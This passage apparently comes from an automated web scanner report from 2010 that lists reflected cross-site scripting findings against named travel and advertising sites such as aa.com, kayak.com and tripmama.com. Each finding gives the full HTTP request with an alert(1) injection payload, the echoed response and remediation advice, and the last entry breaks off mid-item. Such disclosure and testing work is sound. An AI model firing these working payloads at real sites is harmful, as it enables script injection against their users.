GET /content/0/1091/united_econPlus_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-0%3Fmpt%3D1630355c68e7"%3balert(1)//4b54cb0ffd3&mpt=1630355&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/o%3B232570605%3B0-0%3B8%3B26971087%3B4307-300/250%3B38775225/38792982/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:58:09 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 15:56:40 GMT ETag: "64f0b2-b7b-49208f08cde00" Accept-Ranges: bytes Content-Length: 6802 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108d2"%3balert(1)//fe1fb743140 was submitted in the mpvc parameter. This input was echoed as 108d2";alert(1)//fe1fb743140 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-0%3Fmpt%3D1630355&mpt=1630355&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/o%3B232570605%3B0-0%3B8%3B26971087%3B4307-300/250%3B38775225/38792982/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f108d2"%3balert(1)//fe1fb743140 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:58:25 GMT Server: Apache Last-Modified: Thu, 07 Oct 2010 15:56:40 GMT ETag: "64f0b2-b7b-49208f08cde00" Accept-Ranges: bytes Content-Length: 6778 Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e260"><script>alert(1)</script>8e466969b08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire7e260"><script>alert(1)</script>8e466969b08/retargeting_air_results@Bottom3 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.hotwire.com/air/results.jsp?searchTokenId=1&backButtonInputId=index Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:59:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 366 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Sun, 12-Dec-2010 07:51:02 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc055"><script>alert(1)</script>a6b9f53984a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_air_results@Bottom3cc055"><script>alert(1)</script>a6b9f53984a HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.hotwire.com/air/results.jsp?searchTokenId=1&backButtonInputId=index Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:59:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Sun, 12-Dec-2010 07:51:09 GMT;path=/
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3850f"-alert(1)-"dd9070638b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ube/core/us3850f"-alert(1)-"dd9070638b4/compactSearch.do HTTP/1.1 Host: travel.united.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb254'%3bbe327908d was submitted in the REST URL parameter 4. This input was echoed as fb254';be327908d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/242590839/directfb254'%3bbe327908d HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6105 Content-Type: text/html Expires: 0 X-Powered-By: ASP.NET Date: Sun, 12 Dec 2010 16:01:09 GMT Connection: close
4.20. http://www.aa.com/FlightSearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.aa.com
Path:
/FlightSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37454"><img%20src%3da%20onerror%3dalert(1)>be1efe7f575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37454"><img src=a onerror=alert(1)>be1efe7f575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /FlightSearch?37454"><img%20src%3da%20onerror%3dalert(1)>be1efe7f575=1 HTTP/1.1 Host: www.aa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache,max-age=0 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: v1st=3B5EA39B7D61C0B2; Expires=Wed, 19 Feb 2020 14:27:59 GMT; Path=/; Domain=.aa.com Set-Cookie: JSESSIONID=0000ECY392cQHn_4BWfUaKQOrgP:14f0juqsd; Path=/ Date: Sun, 12 Dec 2010 16:01:10 GMT Server: On-Demand Router/1.0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Content-Length: 173726 Connection: close Vary: Accept-Encoding, User-Agent
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- Meta Tags --> <meta http-equiv="Expires" content="0"/> <meta http-equiv="Pragma" con ...[SNIP]... <input type="hidden" name="37454"><img src=a onerror=alert(1)>be1efe7f575" value="1" /> ...[SNIP]...
4.21. http://www.allhotels.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.allhotels.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a781'%3bfd7ffdf5a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a781';fd7ffdf5a60 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2a781'%3bfd7ffdf5a60=1 HTTP/1.1 Host: www.allhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 16:01:41 GMT Set-Cookie: JSESSIONID=C644E569A59469676303FC7121DA0470.p0002; Path=/ Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Set-Cookie: ROUTEID=.p002; path=/ Connection: close Content-Length: 90626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... frooms = '0'; var cannonBallBuilder=new CanonBallBuilder(); checkInDate = $.format.date(checkInDate, dateFormat); checkOutDate = $.format.date(checkOutDate, dateFormat); var urlParamsCannonBall = "2a781';fd7ffdf5a60=1&pageId=allHotelsHomePage"; var urlParamsForAjaxCall = "2a781';fd7ffdf5a60=1&destination="; var selectedMinPrice=0; var selectedMaxPrice=0; var isMinMaxSet=false; var globalMin=0; var globalMax ...[SNIP]...
4.22. http://www.allhotels.com.ec/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.allhotels.com.ec
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b5d'%3b8316182bbaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8b5d';8316182bbaf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e8b5d'%3b8316182bbaf=1 HTTP/1.1 Host: www.allhotels.com.ec Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 16:01:39 GMT Set-Cookie: JSESSIONID=EFF05AA96C644136F67B584BCA7B5142.p0002; Path=/ Content-Type: text/html;charset=utf-8 Content-Language: es Vary: Accept-Encoding,User-Agent Set-Cookie: ROUTEID=.p002; path=/ Connection: close Content-Length: 91878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... BallBuilder=new CanonBallBuilder(); checkInDate = $.format.date(checkInDate, dateFormat); checkOutDate = $.format.date(checkOutDate, dateFormat); var urlParamsCannonBall = "pageId=allHotelsHomePage&e8b5d';8316182bbaf=1"; var urlParamsForAjaxCall = "e8b5d';8316182bbaf=1&destination="; var selectedMinPrice=0; var selectedMaxPrice=0; var isMinMaxSet=false; var globalMin=0; var globalMax=0; var filterBySlider=f ...[SNIP]...
4.23. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.igougo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c36"style%3d"x%3aexpression(alert(1))"195a9c2eff1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c36"style="x:expression(alert(1))"195a9c2eff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?a3c36"style%3d"x%3aexpression(alert(1))"195a9c2eff1=1 HTTP/1.1 Host: www.igougo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:59:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hqxfjbju52drq4j343icrf55; path=/; HttpOnly Set-Cookie: UUIDCookie=360ca53477b840faa7819da391236fbe; expires=Mon, 12-Dec-2011 02:09:34 GMT; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 123209
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"/> <title>Vacation and Hotel Reviews, Travel Photos and Pictures, Travel Deals - IgoUgo</title> <meta name="description" c ...[SNIP]... <base href="http://www.igougo.com/Default.aspx?a3c36"style="x:expression(alert(1))"195a9c2eff1=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39dc5<script>alert(1)</script>9cc557c6740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v35739dc5<script>alert(1)</script>9cc557c6740/h/nvtl/califrame.vtl HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Response
HTTP/1.1 400 Bad Request Server: Apache Context-Type: text/html Vary: Accept-Encoding Content-Type: text/plain; charset=UTF-8 Date: Sun, 12 Dec 2010 15:52:18 GMT Connection: close Content-Length: 547
<p> Your browser sent a request that this ser ...[SNIP]... <br> Request: /v35739dc5<script>alert(1)</script>9cc557c6740/h/nvtl/califrame.vtl</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84d2a</script>d4ea5dac053 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cautious-online-shoppers-more-likely-to-buy-04674784d2a</script>d4ea5dac053/ HTTP/1.1 Host: www.marketingvox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebbd</script><script>alert(1)</script>b08c3704bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cautious-online-shoppers-more-likely-to-buy-046747/?6ebbd</script><script>alert(1)</script>b08c3704bae=1 HTTP/1.1 Host: www.marketingvox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <link rel="st ...[SNIP]... w', 'MV: Entry: Cautious Online Shoppers More Likely to Buy']);
4.27. http://www.nextour.co.kr/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nextour.co.kr
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c289"-alert(1)-"71da0a99601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3c289"-alert(1)-"71da0a99601=1 HTTP/1.1 Host: www.nextour.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:54:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta ...[SNIP]... ;
4.28. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pronto.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d2fe'><script>alert(1)</script>ee9b628149b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2d2fe'><script>alert(1)</script>ee9b628149b=1 HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the categoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e52d"-alert(1)-"eea9d11b805 was submitted in the categoryName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category.jsp?actionType=1&categoryType=Type&categoryName=Flights6e52d"-alert(1)-"eea9d11b805&sid=S287&bid=B314947 HTTP/1.1 Host: www.travel-ticker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head>
<meta name="google-site-verification" content="FFxTPlXl5PxHoFPYnWOWx2LidO1L6Ex ...[SNIP]... set // from the contents of the page AnalyticsSupport.setAnalyticsContextVariable("channel", "Type"); AnalyticsSupport.setAnalyticsContextVariable("prop10", "Flights6e52d"-alert(1)-"eea9d11b805"); </script> ...[SNIP]...
The value of the TMAffiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae01'-alert(1)-'1fb9aacf846 was submitted in the TMAffiliate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?TMAffiliate=COAListing5ae01'-alert(1)-'1fb9aacf846 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... t language="javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=COAListing5ae01'-alert(1)-'1fb9aacf846'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
</script> ...[SNIP]...
4.31. http://www.tripmama.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tripmama.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2ec0'-alert(1)-'1cc570690fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f2ec0'-alert(1)-'1cc570690fa=1 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the InhouseAdImg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52954'-alert(1)-'47b62fae07c was submitted in the InhouseAdImg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay&TMSub=List&InhouseAdImg=/travel/banners/TripMamaH160x600.gif52954'-alert(1)-'47b62fae07c HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the TMAffiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53cac'-alert(1)-'300c6b6f71e was submitted in the TMAffiliate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay53cac'-alert(1)-'300c6b6f71e&TMSub=List HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... t language="javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=CheapoStay53cac'-alert(1)-'300c6b6f71e&TMSub=List'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
The value of the TMSub request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971da'-alert(1)-'79c2d86397b was submitted in the TMSub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay&TMSub=List971da'-alert(1)-'79c2d86397b HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... "javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=CheapoStay&TMSub=List971da'-alert(1)-'79c2d86397b'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
</script> ...[SNIP]...
4.35. http://www.tripmama.com/default.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tripmama.com
Path:
/default.aspx
Issue detail
